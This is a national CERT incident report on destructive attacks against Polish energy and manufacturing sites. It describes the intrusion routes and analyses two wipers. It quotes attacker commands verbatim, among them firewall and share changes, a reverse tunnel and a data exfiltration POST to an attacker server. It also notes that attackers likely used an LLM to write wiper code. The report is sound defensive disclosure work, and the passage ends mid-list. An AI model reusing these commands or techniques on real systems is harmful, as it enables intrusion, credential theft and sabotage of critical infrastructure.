Energy Sector Incident Report – 29 December Energy Sector Incident Report – 29 December Energy Sector Incident Report – 29 December ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER CERT Polska (CERT.PL) – a team operating within the structures of NASK – National Research Institute, carrying out the tasks of CSIRT NASK, one of the three national‑level CSIRT teams operating within Poland’s national cybersecurity system. The Author of This Report Is: Table of Contents Introduction� 4 Attack on Renewable Energy Plants� 5 Architecture of a Renewable Energy Facility� 5 Attack Vector on the GCP� 7 Destructive Activities� 7 Attack on the Large CHP Plant� 12 Attack on a Manufacturing Sector Company� 22 Initial Access� 22 Modification of FortiGate Configuration for Persistence� 22 Activities Against Cloud Services� 26 Malware Analysis� 27 DynoWiper� 27 LazyWiper� 32 Wipers Distribution Method� 34 Attribution� 36 Indicators of Compromise� 38 Detection Rules� 39 MITRE ATT&CK Enterprise� 40 MITRE ATT&CK ICS� 43 ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 4 Introduction On 29 December 2025, during the morning and afternoon hours, coordinat‑ ed attacks occurred in Poland’s cyberspace. The attacks targeted numer‑ ous wind and solar farms, a private company in the manufacturing sector, and a combined heat and power (CHP) plant supplying heat to nearly half a mil‑ lion customers in Poland. All of the attacks were purely destructive in nature – by analogy to the physical world, they can be compared to deliberate acts of arson. It is worth noting that this period coincided with low temperatures and snowstorms affecting Poland, shortly before New Year’s Eve. Based on tech‑ nical analysis, it can be concluded that all of the aforementioned attacks were carried out by the same threat actor. These events affected both information systems (IT) and physical indus‑ trial equipment (OT), which is rarely observed in attacks reported publicly to date. We are publishing this report to share knowledge about the course of events and the techniques used by the attacker. We hope that this will in‑ crease awareness of the real risks associated with cyber sabotage. These at‑ tacks represent a significant escalation compared to the incidents we have observed so far. ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 5 Attack on Renewable Energy Plants In the renewable energy sector, an attack targeted at least 30 wind and solar farms in Poland. The attack resulted in a loss of communication between the facilities and distribution system operators (DSOs), but it did not affect ongo‑ ing electricity generation. From the perspective of the transmission system operator (Polskie Sieci Elektroenergetyczne), the attack did not impact the stability of the Polish power system. It should be noted, however, that given the level of access obtained by the attacker, there was a risk of causing a dis‑ ruption in electricity generation at the affected facilities. Even if such a dis‑ ruption had occurred, analyses indicate that the combined loss of capacity across all 30 facilities would not have affected the stability of the Polish power system during the period in question. Architecture of a Renewable Energy Facility To understand the course of the attack and its consequences, it is first nec‑ essary to explain the architecture of renewable energy farms. Electricity gen‑ erated from wind turbines and photovoltaic (PV) systems is collected and routed to a power substation, commonly referred to as the grid connection point (GCP). Within the substation, the voltage is stepped up by a transformer to 110 kV, enabling efficient transfer of power to the distribution grid. Grid op‑ eration and security are maintained by the distribution system operator (DSO), which oversees conditions at the connection point and ensures stable system operation. ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 6 Illustrative renewable energy farm and the location of the GCP The attack affected the GCP substation, which serves not only as the physi‑ cal grid interconnection point but also as the location through which the DSO performs remote monitoring and supervisory control. Such substations are typically remotely managed and unmanned, with remote access capabilities commonly employed for operations and maintenance. Within the industrial automation domain, the key GCP components rele‑ vant to the described attack include: • Remote Terminal Unit (RTU): responsible for telecontrol functions and supervision of the substation’s operation. • Local HMI: used to visualize the operational status of the substation based on data provided by the RTU. • Protection relays: responsible for protection functions, including fault de‑ tection and isolation. • Serial device servers: used to connect devices utilizing RS232 or RS485 interfaces and to provide IP-to-serial connectivity, enabling communica‑ tion with the DSO where a serial interface is required. • Primary and backup communication links (a cellular router): used to con‑ nect to the distribution system operator’s SCADA system via DNP3.0 or IEC 101 protocols. • Integrated VPN concentrator and firewall: used to provide remote service access, network segmentation, and, where applicable, connectivity be‑ tween the renewable energy facility’s systems and the DSO. It should be emphasized that in Poland DSOs typically require communi‑ cation between the operator’s SCADA system and the GCP to pass through the serial links, using the DNP3.0 or IEC 101 protocols. Such an approach reduces the likelihood that a compromise of the GCP could be leveraged as a direct attack vector against the DSO’s network. FIG. 1  � DSO (DISTRIBUTION SYSTEM OPERATOR) TO TRANSMISSION GRID SUPERVISORY CONTROL GRID CONNECTION POINT (GCP) SUBSTATION 110/30KV 30KV 110KV ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 7 Attack Vector on the GCP In each affected facility, a FortiGate device was present, serving as both a VPN concentrator and a firewall. In every case, the VPN interface was ex‑ posed to the Internet and allowed authentication to accounts defined in the configuration without multi‑factor authentication. Due to the destructive ac‑ tions carried out by the attacker, it was not possible to recover complete logs from any of the compromised devices. During the analysis, it was determined that some of these devices had been vulnerable in the past, in certain peri‑ ods for extended durations, including to remote code execution vulnerabili‑ ties. Available intelligence indicates it is a common practice in the industry to reuse the same accounts and passwords across multiple facilities. In such a scenario, the compromise of even a single account could have enabled the threat actor to identify and access other devices where the same credentials were used. The networks of the analyzed facilities often contained segregated VLAN subnets; however, at the time of the attack, the threat actor had administrative privileges on the device. These privileges were likely used to obtain creden‑ tials for a VPN account with access to all subnets. Even if no such account had existed, the attacker, having administrator-level access, could have mod‑ ified the device configuration to enable equivalent access. All analyzed devic‑ es were factory-reset by the threat actor on the day of the attack. This action appears destructive in intent, likely aimed at hindering the restoration of oper‑ ational capability, and it also served to erase traces of the attacker’s activity. Destructive Activities On 29 December 2025, destructive actions were initiated at each of the affect‑ ed facilities against the devices to which the threat actor had gained access. The activity observed within individual substations appears to have been at least partially automated. Devices were damaged in ascending order of IP ad‑ dressing. It was observed that if the attack failed at a given IP address within a network segment, it was not continued against subsequent addresses The damage to RTU controllers, described further, was the direct cause of the loss of communication between the facility and the DSO and prevented remote control, but did not affect the ongoing electricity generation. Hitachi RTUs In most of the affected farms, Hitachi RTU560 controllers were in use, running firmware versions 12.6.6.0, 12.7.3.0, 13.1.1.0, and 13.5.2.0. The devices were ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 8 configured with default credentials, including an account named “Default.” All devices exposed a web interface accessible from the GCP network and, with appropriate privileges, reachable from the FortiGate device. The attack was carried out by logging into the web interface using the “Default” account. This account has permissions to modify the device firm‑ ware and was used to upload corrupted firmware. The firmware file, in ELF for‑ mat, was modified such that 240 bytes of 0xFF were inserted at the program entry point. As a result, the processor executed an invalid instruction, which caused a fault and led to a device reboot loop. Original firmware (left) and firmware corrupted by the attacker (right) It is worth noting that the modified firmware uploaded by the attacker identified itself as version 13.5.3.0, which was not deployed in any of the af‑ fected facilities. This indicates that the attacker likely obtained the firmware from outside the investigated environments. Excerpt from the RTU event log dated 29 December 2025 The secure update feature, which enables verification of the uploaded firmware’s digital signature, was introduced in version 13.2.1, but required ex‑ plicit activation. None of the devices that supported secure update had this feature enabled. Even if it had been enabled, a vulnerability (CVE‑2024‑2617) FIG. 2  � FIG. 3  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 9 exists that allows secure update to be bypassed. This vulnerability was fixed in version 13.7.7. CERT Polska remained in contact with the Hitachi Energy PSIRT dur‑ ing incident handling, which independently confirmed the described attack scenario. Mikronika RTUs The attacker also carried out destructive actions at facilities where Mikronika controllers were in use. The controller architecture is based on the Linux oper‑ ating system. In the observed incidents, the attacker used default credentials to log in via the SSH console to an account with root privileges. The attacker then executed a command intended to delete all files from the system, which resulted in device failure. The exact command executed during the attack was not preserved in the .bash_history file. During the analysis, Mikronika was able to recover a portion of the device logs. These logs indicate that on 25 December 2025, at all facilities where the device was deployed, the attacker conducted network scanning and login attempts. CERT Polska remained in contact with Mikronika during incident han‑ dling, and the company independently confirmed the described course of the attack. Hitachi Relion Protection and Control Relays (IEDs) In two cases, destructive actions were observed targeting Hitachi Relion 650 v1.1 IEDs. These devices have the FTP service enabled by default, which provides access to the device’s system files. The attacker used a built‑in ac‑ count with default credentials to delete files essential for device operation. This resulted in an error that caused the device to shut down and prevented it from being restarted. It should be emphasized that if the device had been deployed in accord‑ ance with the manufacturer’s recommendations, the default FTP account would have been automatically disabled. CERT Polska remained in contact with the Hitachi Energy PSIRT dur‑ ing incident handling, which independently confirmed the described course of the attack. Mikronika HMI Computers In some cases, Mikronika Syndis software installed on Windows 10 systems was used as the HMI. The machines were configured with a default password set during deployment for an account with local administrator privileges. ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 10 The attacker leveraged knowledge of this account (with no evidence of password‑guessing attempts) to gain access to the machine via the Remote Desktop service. On 8 December 2025, the attacker introduced a series of system configuration changes. These included, among others, enabling ad‑ ministrative shares and creating a new firewall rule named “Microsoft Update”, which allowed communication over TCP port 445. The applied configuration changes enabled network access to disk via the SMB protocol, as well as re‑ mote command execution on the system. The modifications were carried out using PowerShell. powershell.exe New-ItemProperty -Path 'HKLM:\SYSTEM\ CurrentControlSet\Services\LanmanServer\Parameters' -Name 'AutoShareWks' -Value 1 -PropertyType DWord -Force powershell.exe New-ItemProperty -Path 'HKLM:\SYSTEM\ CurrentControlSet\Services\LanmanServer\Parameters' -Name 'AutoShareServer' -Value 1 -PropertyType DWord -Force powershell.exe Get-Service LanmanServer|Restart-Service -Verbose -Force powershell.exe New-NetFirewallRule -Name 'Microsoft Update' -DisplayName 'Microsoft Update' -Protocol TCP -LocalPort 445 -Action Allow After introducing the new configurations on the computer, the attacker subsequently used the Impacket script suite to conduct reconnaissance activ‑ ities. Among the commands executed were, for example, netstat and tasklist. On the morning of 29 December 2025, the event logs and the operating system file system recorded a successful network logon, followed by the cre‑ ation of a malicious file at the path C:\Source.exe. This file was then executed to damage the data. DynoWiper malware file on the HMI machine’s disk A full analysis of the Source.exe file is presented in a dedicated chapter. It is worth noting that this is exactly the same malware as that used in the inci‑ dent at the Combined Heat and Power (CHP) plant, described later in this re‑ port, and referred to as DynoWiper. FIG. 4  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 11 In cases where an HMI with different credentials for the local adminis‑ trator account, unsuccessful password‑breaking attempts were observed. In those cases, the HMI was not damaged. Moxa NPort Serial Device Servers Each of the affected facilities used Moxa NPort 6xxx serial device servers. The devices had the web interface enabled and were configured with default login credentials. The attacker exploited these credentials to restore the de‑ vices to factory settings, change the login password, and set the device IP address to an unreachable value, such as 127.0.0.1. This resulted in the un‑ availability of the devices, while the change of the password and IP address was intended to cause delay in restoration of operational capability. In each of the analyzed cases, all Moxa devices accessible at the facility were targeted. ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 12 Attack on the Large CHP Plant On 29 December 2025, an attack was also carried out against one of Poland’s CHPs. The objective of the sabotage was the irreversible destruction of data stored on devices within the organization’s internal network, achieved through the execution of the wiper1 malware. The destructive attack was preceded by a long‑term infiltration of the infrastructure and the theft of sensitive informa‑ tion related to the organization’s operations. As a result of these activities, the attacker gained access to privileged accounts in the Active Directory domain, which enabled unrestricted lateral movement across the organization’s sys‑ tems. The distribution of the wiper malware to machines within the network was carried out using GPOs; however, the EDR solution deployed by the or‑ ganization detected the malicious activity and blocked the attack. Indicators of suspicious activity within the infrastructure were observed several months prior to the execution of the wiper malware. It was not possible to fully confirm that two clusters of activity observed in 2025 were conducted by the same threat actor. However, the attacker’s reconnaissance of industrial automation systems, combined with the lack of further activity following the theft of cre‑ dential databases from a domain controller in the first cluster, suggests an actor operating over an extended period with a consistent operational profile. Early Activity in the Organization’s Infrastructure Between March and July 2025, suspicious activities were observed within the attacked organization’s infrastructure, including reconnaissance, unauthor‑ ized access to data, and attempts to obtain user credentials. Initial Indicators of the Attacker’s Presence An analysis of Microsoft Windows event logs from the domain controller, to‑ gether with events recorded by the EDR, showed that the attacker’s first activ‑ ities took place between March and May of 2025. Correlation of events made it possible to determine that the attacker gained access to one of the jump 1 Wiper – malware designed to destroy files or wipe disks, with the objective of rendering a device non‑functional or making data unusable. ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 13 hosts, where RDP logins were recorded from an address assigned to one of the interfaces of a FortiGate perimeter device. Subsequently, from this ma‑ chine, the attacker connected to other systems (including the domain control‑ ler) using Remote Desktop. Reconnaissance Traces Analysis of Microsoft Windows system artifacts revealed that after gaining ac‑ cess to the domain controller, the attacker continued infrastructure reconnais‑ sance, with a particular focus on industrial automation systems, while also enumerating systems available within the network. For this purpose, the at‑ tacker used the nircmd console utility to capture screenshots of individual de‑ vices. To execute programs on target machines, the attacker used PsExec from the PsTools suite. Additionally, on many machines, remote execution of a command was observed that wrote information to a file named outlog.txt, including: currently running processes, network connections, routing tables, ARP cache, and the contents of user directories. Commands executed using PsExec on multiple machines: nircmd.exe "savescreenshot C:\Windows\Temp\imagetmp.png" cmd.exe /c "tasklist > C:\Windows\TEMP\outlog.txt && netstat -nao >> C:\Windows\TEMP\outlog.txt && netstat -r >> C:\Windows\TEMP\ outlog.txt && arp -a >> C:\Windows\TEMP\outlog.txt && dir /s /b C:\ Users >> C:\Windows\TEMP\outlog.txt" On the domain controller, the attacker also interacted with the file sys‑ tems of other systems, gaining access to them via the SMB protocol. Im‑ portantly, most of the systems accessed in this manner contained the word “scada” in their names, indicating a specific interest in the industrial automa‑ tion domain. In addition, the attacker enumerated resources shared by a NAS server and attempted to establish RDP connections to additional machines. These activities were spread out over time and were predominantly conduct‑ ed during standard business hours. Privilege Escalation within the Infrastructure Nearly one month after gaining access to the domain controller, the attacker placed a Base64‑encoded ZIP archive on the server and decoded it using the built‑in certutil utility. The material available for analysis did not allow the con‑ tents of the archive to be determined; however, immediately after this event, the EDR system detected a likely credential‑theft attempt involving a mem‑ ory dump of the LSASS process. Shortly thereafter, the attacker was also observed using Rubeus, a tool designed for attacks against the Kerberos au‑ thentication protocol. The attacker used it to create a Diamond Ticket. In the second half of July, the attacker performed a dump of the entire Active Direc‑ tory database by extracting the contents of the ntds.dit file. ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 14 Attacker Activity in Late 2025 In late 2025, unauthorized activities associated with reconnaissance, creden‑ tial theft, and data access were once again observed within the attacked or‑ ganization’s infrastructure. This time, the attacker also attempted to damage data on servers and workstations. Method of Access to the Network Infrastructure Analysis of the forensics data revealed that during the incident the attacker repeatedly established connections to the SSL‑VPN portal service of a For‑ tiGate device located at the organization’s network perimeter. The attacker gained access to the infrastructure using multiple accounts that were stati‑ cally defined in the device configuration and did not have two‑factor authen‑ tication enabled. The attacker connected using Tor nodes, as well as Polish and foreign IP addresses, which were often associated with compromised infrastructure. Excerpt from the FortiGate device event log showing two unauthorized login attempts After gaining access to the SSL‑VPN portal service, the attacker used bookmarks defined in the configuration file that allowed authorized users to access jump hosts via the RDP. Analysis of the FortiGate device configura‑ tion file indicates that some users had statically configured target user creden‑ tials, which enabled connections to the jump host from the SSL‑VPN portal without the need to provide additional local or domain user credentials. FIG. 5  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 15 Excerpt from the FortiGate device configuration file showing an RDP‑type bookmark with statically defined credentials Excerpt from the FortiGate device event log showing the attacker’s use of the bookmark mechanism Use of a Reverse SOCKS Proxy Tunnel During his activities, the attacker tunneled certain actions using Reverse SOCKS Proxy software. This method involves deploying specialized soft‑ ware on a machine inside the internal infrastructure, which then establishes a tunnel to an attacker‑controlled machine, often located on a public network. This setup allows the attacker to remotely route attacks to other systems with‑ in the internal network through the machine running the Reverse SOCKS Proxy. Traces of the execution of this type of software, along with the IP ad‑ dress of the attacker‑controlled server, were identified on one workstation. For this purpose, the attacker used the rsocx2 tool, operating under the filenames r.exe and rsocx.exe. r.exe -r 31.172.71[.]5:8008 FIG. 6  � FIG. 7  � 2 https://github.com/b23r0/ rsocx https://github.com/b23r0/rsocx https://github.com/b23r0/rsocx ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 16 Infrastructure Reconnaissance Traces Correlation of SSL‑VPN sessions and Remote Desktop logins made it pos‑ sible to identify the techniques and tools used by the attacker to conduct re‑ connaissance within the infrastructure. Among the tools used by the attacker were standard system utilities, including nslookup and ping. The use of built‑in system tools allowed the attacker to avoid detection by security systems, as these utilities are natively installed in Microsoft Windows and are commonly used by both users and administrators. Excerpt from the event log of one of the domain controllers showing examples of executed ping and lookup commands Another tool used by the attacker for network reconnaissance was a port‑scanning utility, namely Advanced Port Scanner and Advanced IP Scanner. Evidence of the execution of this software and access to files associ‑ ated with it was detected on several devices within the organization’s network. Excerpt from the file system of one workstation showing traces of the execution of Advanced Port Scanner Use of Microsoft Edge for Service Reconnaissance and File Transfers Preserved logs indicate that the attacker used the Microsoft Edge web brows‑ er running in private mode (invoked with the --inprivate parameter) to ac‑ cess services located both within the organization’s internal network and at third‑party entities. In addition, the browser was used to download addition‑ al files. While Advanced Port Scanner was downloaded directly from the ven‑ dor’s website, the attacker also retrieved files hosted on the Dropbox cloud storage service. Connections to the pastebin.com domain (a service used for storing and sharing text data) were also observed. FIG. 8  � FIG. 9  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 17 Methods of Communication Between Systems in the Infrastructure The primary method of communication used by the attacker between comput‑ ers within the network infrastructure was the RDP. This access method was also used by authorized users of the infrastructure, which allowed the attacker to avoid raising suspicion. Like legitimate users, the attacker first logged into a jump host and then proceeded to access other systems within the network. The attacker also used a collection of scripts from the publicly available Impacket suite for communication between systems. Impacket enables inter‑ action with a wide range of network protocols, including remote command ex‑ ecution on systems within the infrastructure, for example via the SMB service. Traces of Impacket usage were identified by the EDR system deployed in the infrastructure. Theft of Credentials from the LSASS Service of the Workstation To escalate privileges within the infrastructure and gain access to additional systems, the attacker employed a technique involving the extraction of cre‑ dentials from a memory dump of the Microsoft Windows LSASS process. The LSASS service is responsible, among other functions, for user authentication within the operating system. During the incident, the creation of a memory dump of this service was observed. The attacker could then have attempt‑ ed to crack user passwords or reuse password hash values to gain access to other systems. Excerpt from the antivirus quarantine file showing the path to the LSASS process memory dump created on one of the workstations Theft of the Active Directory Database and Registry Hives from a Domain Controller The attacker also targeted the SAM and SYSTEM registry hives, as well as the Active Directory database located on one of the domain controllers. The identified artifacts indicate that the attacker used the built‑in reg command to create copies of the SAM and SYSTEM registry hives, and the vssadmin sys‑ tem utility to create a Volume Shadow Copy of the C: partition in order to steal the ntds.dit file containing the Active Directory database. FIG. 10  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 18 The stolen data was subsequently compressed, and an attempt was made to exfiltrate it using the PowerShell interpreter to a server controlled by the attacker. Invoke-RestMethod -Uri http://31.172.71[.]5:50443 -Method Post -InFile .\kkk.zip Excerpt from the Remote Desktop client cache on a compromised workstation showing traces of commands used to create copies of the SAM and SYSTEM registry hives Excerpt from the Remote Desktop client cache on a compromised workstation showing traces of commands used to create a copy of the Active Directory database file and to attempt data exfiltration to a remote server Theft of FortiGate Device Configurations Analysis of event logs from one of the domain controllers revealed that the at‑ tacker additionally stole configuration files from several FortiGate devices op‑ erating within the compromised organization. Correlation of events related to processes and files created at the time indicates that the theft was carried out using the Microsoft Edge web browser running in private mode. FIG. 11  � FIG. 12  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 19 Excerpt from an event log associated with the creation of FortiGate device configuration files on one of the domain controllers Modification of the FortiGate Perimeter Device Configuration Analysis of the event logs of the FortiGate device located at the network pe‑ rimeter of the compromised organization revealed that the attacker also made changes to its configuration. These modifications included, among others, the addition of a new rule whose purpose was to allow connections using any pro‑ tocol and any IP address to a specified device. As part of this rule, network traffic logging was disabled. Additionally, the name of the newly created rule mimicked the name of an institution already present in the device configura‑ tion, likely in an attempt to avoid detection. Excerpt from the FortiGate device event log showing the addition of a new rule Destruction of Files on Workstations On the morning of 29 December 2025, the attacker gained access to the SSL‑VPN portal and then used it to establish a Remote Desktop connection to a jump host. From this system, the attacker connected to one of the domain controllers, where an archive was created containing, among other things, a wiper malware file intended to permanently destroy data on machines with‑ in the network infrastructure. FIG. 13  � FIG. 14  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 20 Excerpt from an event log related to the creation of malicious files on one of the domain controllers The wiper malware was placed on a network share accessible to other com‑ puters within the network and was then executed using an additional Group Policy Object (GPO). A detailed description of the wiper (DynoWiper) and the script used to distribute it is provided in the “Malware Analysis” chapter. The executable file was not detected by antivirus software; however, its execution was blocked at runtime by the EDR solution through the use of a canary mechanism, i.e. files that trigger an alert when their contents begin to be modified. This resulted in the halting of data overwriting on more than 100 machines on which the file had already been executed. On the same day, the attacker made another attempt to execute a slightly modified version of the wiper, but this attempt was also unsuccessful. Excerpt from an event log related to the creation of additional malicious files on one of the domain controllers Destruction of Data on Server Disks In addition to attempts to destroy data on the workstations belonging to the compromised organization, the attacker also attempted to directly destroy data on disks attached to servers within the infrastructure. For this purpose, the attacker used a minimalist Tiny Core Linux distribution, the image of which was downloaded to one of the domain controllers and then booted on a server FIG. 15  � FIG. 16  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 21 using the KVM interface. In subsequent steps, the attacker used the dd com‑ mand to overwrite portions of the disks with random data. Excerpt from the Remote Desktop client cache on a compromised workstation showing traces of permanent data destruction on disks attached to one of the servers For the same purpose, the attacker also attempted to use a technolo‑ gy known as Intel Rapid Storage Technology, through which an attempt was made to modify the configuration of disk RAID arrays. Excerpt from the Remote Desktop client cache on a compromised workstation showing traces of an attempt to reconfigure the RAID array of one of the servers Excerpt from the Remote Desktop client cache on a compromised workstation showing traces of an attempt to reconfigure the RAID array of one of the servers FIG. 17  � FIG. 18  � FIG. 19  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 22 Attack on a Manufacturing Sector Company On the same day, 29 December 2025, the attacker also attempted to disrupt the operations of a manufacturing sector company. These actions were car‑ ried out in a coordinated manner with the attacks against energy sector enti‑ ties; however, the target was opportunistic in nature and not linked to the other affected organizations. Initial Access The attacker gained access via a Fortinet perimeter device. The device had been vulnerable in the past, and its configuration had been stolen and public‑ ly disclosed, including in a post on an online forum used by criminal commu‑ nities. After obtaining access to the device, the attacker introduced changes aimed at maintaining persistent access, even in the event that user pass‑ words were changed. Modification of FortiGate Configuration for Persistence The introduced modifications were based on the scripting mechanism built into Fortinet devices. The attacker created two scripts for further credentials exfiltration (fig. 20) and to modify security settings (fig. 21). Both scripts were executed weekly. ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 23 A script used to retrieve the password of a privileged user found on a FortiGate device. The redacted section contains the name of the account used by the attacker. A script used to modify security settings found on a FortiGate device. The redacted section contains the name of the account used by the attacker. FIG. 20  � FIG. 21  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 24 FortiGate devices include a built‑in capability to send notifications to a des‑ ignated Slack channel. Such messages may contain predefined text, as well as information obtained from system services (e.g. logs) or the output of other scripts. The attacker exploited this mechanism to send the execution results of the previous two scripts to a Slack channel under their control. A script used to exfiltrate data to an attacker‑controlled Slack channel found on a FortiGate device. The redacted section contains the name of the account used by the attacker. All three scripts were visible in the configuration panel, under the sched‑ uled tasks section: View of scheduled tasks on a FortiGate device. FIG. 22  � FIG. 23  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 25 Access to the Company’s Systems and Lateral Movement To gain access to the company’s internal systems, the attacker used previ‑ ously obtained credentials to establish an SSL‑VPN tunnel. For movement across devices within the network, the attacker used, among other tools, the Impacket3. Execution of the File‑Destruction Script The attacker gained access to a domain controller with administrative priv‑ ileges. To distribute the file‑destruction script, the attacker used the same mechanism as in the case of the combined heat and power plant, namely the creation of a Group Policy Object, which retrieved the target file from a net‑ work share. The wiper itself was written in PowerShell. A detailed analysis of this malware is provided in a dedicated chapter (LazyWiper). 3 https://github.com/fortra/ impacket https://github.com/fortra/impacket https://github.com/fortra/impacket ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 26 Activities Against Cloud Services The attacker used credentials obtained from the on‑premises environment in attempts to gain access to cloud services. After identifying credentials for which corresponding accounts existed in the M365 service, the attack‑ er downloaded selected data from services such as Exchange, Teams, and SharePoint. The attacker was particularly interested in files and email mes‑ sages related to OT network modernization, SCADA systems, and technical work carried out within the organizations. The attacker also attempted to expand privileges by exploiting misconfig‑ ured permissions. ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 27 Malware Analysis During the attack, malware samples were used that could not be attributed to any known malware family. The purpose of the malware was the irrevers‑ ible destruction of data, with no attempt to extort a ransom. Two categories of such malware were observed: a native Windows binary (DynoWiper) and a PowerShell-based script (LazyWiper). DynoWiper During incident response activities, four similar malware samples were iden‑ tified (see table below). Analyzed DynoWiper variantsTABLE 1  � Sha256 Filename Compilation date (UTC) Version Incident 65099f306d27c8bcdd7ba3062c012d24 71812ec5e06678096394b238210f0f7c Source.exe 2025-12-26 13:51:11 A Renewable Energy farm 835b0d87ed2d49899ab6f9479cddb8b4 e03f5aeb2365c50a51f9088dcede68d5 dynacom_update.exe 2025-12-26 13:51:11 A CHP plant 60c70cdcb1e998bffed2e6e7298e1ab6 bb3d90df04e437486c04e77c411cae4b schtask.exe 2025-12-29 13:17:06 B CHP plant d1389a1ff652f8ca5576f10e9fa2bf8e 8398699ddfc87ddd3e26adb201242160 schtask.exe 2025-12-29 14:10:07 B CHP plant ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 28 It is possible to distinguish versions A and B of the malware: • dynacom_update.exe and Source.exe are the same program; the only dif‑ ference is a redacted PDB path in the dynacom_update version. • The schtask.exe files are practically identical – they are most likely the same source code compiled twice (the compilation timestamps differ by 40 minutes). • The difference between versions A and B is minor and is described below. It should be noted that the compilation date declared by an executable file can be easily forged by an attacker; however, the identified dates correspond to the dates of the attacks and the likely chronology of events. The operations performed by the malware can be summarized as follows: • Initialization (including seeding of the random number generator), • Corruption of data in the file system, • Deletion of files on disk, • Termination of operation (system shutdown in version A). The main function is structured as follows (all local function names were assigned during analysis): main function of DynoWiper version A FIG. 24  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 29 The primary difference between versions A and B is that the computer shutdown function was removed in version B - the program terminates with‑ out invoking the ExitWindowsEx function. Additionally, in version B, a call to Sleep(5000) was added between the data corruption and file deletion stag‑ es. In version B, the main function is structured as follows: main function of DynoWiper version B The random number generator used is the well-known Mersenne Twister algorithm. It is not suitable for cryptographic purposes; however, in the case of the analyzed malware, while the random data used to overwrite files is pre‑ dictable, it does not allow for data recovery. The WipeCorruptData and WipeEraseFiles functions are similar in structure, and their most important fragment is presented below: Code fragment initiating file corruption in the root directory of each disk FIG. 25  � FIG. 26  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 30 The ScanLogicalDrives function creates a list of drives visible to the system (using the GetLogicalDrives and GetDriveType functions), col‑ lecting drives of type DRIVE_REMOVABLE and DRIVE_FIXED. Next, for each of these drives, recursive file corruption and deletion is performed. For each directory, all contained elements are enumerated using the FindFirstFile and FindNextFile functions, and the following operation is carried out: Code fragment responsible for directory enumeration and filtering This means that if the enumerated element is a file, it is corrupted, and if it is a directory, it is processed recursively, provided that the directory name is not one of the following, compared case-insensitively: • system32, • windows, • program files, • program files(x86), • temp, • recycle.bin, • $recycle.bin, • boot, • perflogs, • appdata, • documents and settings. It is worth noting that the directory name “program files(x86)” contains an error. This is the result of an attacker mistake - the correct name contains a space after “files” and should be “program files (x86)”. FIG. 27  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 31 Ultimately, the file corruption procedure itself is as follows: Code responsible for corrupting a file by overwriting it with 16‑byte blocks Each file is opened using the CreateFileW method and then overwritten through multiple calls to SetFilePointerEx and WriteFile. The number of overwrite blocks and the bytes written are generated using the previously in‑ itialized Mersenne Twister random number generator. The malware corrupts files by selecting several offsets within the victim file and overwriting them with pseudorandom 16‑byte sequences. The program always overwrites the be‑ ginning of the file and always writes at least 16 bytes (even if the corrupted file is smaller or empty). The number of overwrite locations is determined based on the file size. The larger the file, the more overwrite locations are selected, but never more than 4096. These offsets are then overwritten with pseudorandom byte se‑ quences. It should be noted that overwriting only a limited number of pseudor‑ andom offsets significantly accelerates the file‑corruption process compared to overwriting the entire file. The program also modifies file permission at‑ tributes using SetFileAttributesEx with the FILE_ATTRIBUTE_NORMAL parameter. FIG. 28  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 32 The CreateException function contains a characteristic Unicode string “Error opening file:”, which is part of the error message used by the program in the event of issues encountered while writing to a file. After overwriting files using the WipeCorruptData method, the wiper deletes files using the WipeEraseData method. A modified disk traversal al‑ gorithm is applied – this time, directories located in the root directory are not skipped, while the exclusion list from the first phase is still applied to subdirec‑ tories. File deletion is performed using the DeleteFileW function. It is important to emphasize what the program does not contain: • A persistence mechanism, i.e. it does not attempt to execute after a sys‑ tem reboot. • A way to communicate with any command‑and‑control (C2) server. • Any shell command invocations within the operating system. • It does not attempt to conceal its activity from antivirus software. A characteristic PDB path is present in all samples except dynacom_ update.exe: „C:\Users\vagrant\Documents\Visual Studio 2013\Projects\Source\ Release\Source.pdb”. No additional publicly available samples with this indicator were identified. LazyWiper In the incident involving the manufacturing sector company, the destructive attack was carried out using a PowerShell‑based wiper, referred to by us as LazyWiper. The script overwrites files on the system with pseudorandom 32‑byte se‑ quences, written at 16‑byte intervals. This results in approximately two‑thirds of the file being overwritten, thereby rendering it unusable and irrecover‑ able. The overwriting process is implemented via a C# function named WriteRandomBytes. This function differs from the rest of the script in terms of structure, coding style, and indentation conventions. It also contains nonsen‑ sical comments that would likely not be written by a human developer. It ap‑ pears that this file‑corruption method was chosen because at first glance it was intended to be faster than overwriting the entire file; however, due to the way file operations are performed, it is in practice significantly slower. The function was likely generated using an LLM model. ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 33 C# function used to overwrite files The script includes a safeguard mechanism that terminates execution if it is run on a domain controller: Code fragment preventing execution on a domain controller The data‑overwriting function is executed for files with the following extensions: .rar, .tar.gz, .zip, .7z, .json, .bcp, .bak, .gho, .erf, .edb, .onepkg, .pst, .ldiff, .pcf, .pfx, .crt, .pcks, .key, .pcks12, .pcks7, .p7b, .pem, .rtf, .asd, .wbk, .xlk, .dit, .xlsx, .pcp, .old, .png, .odt, .doc, 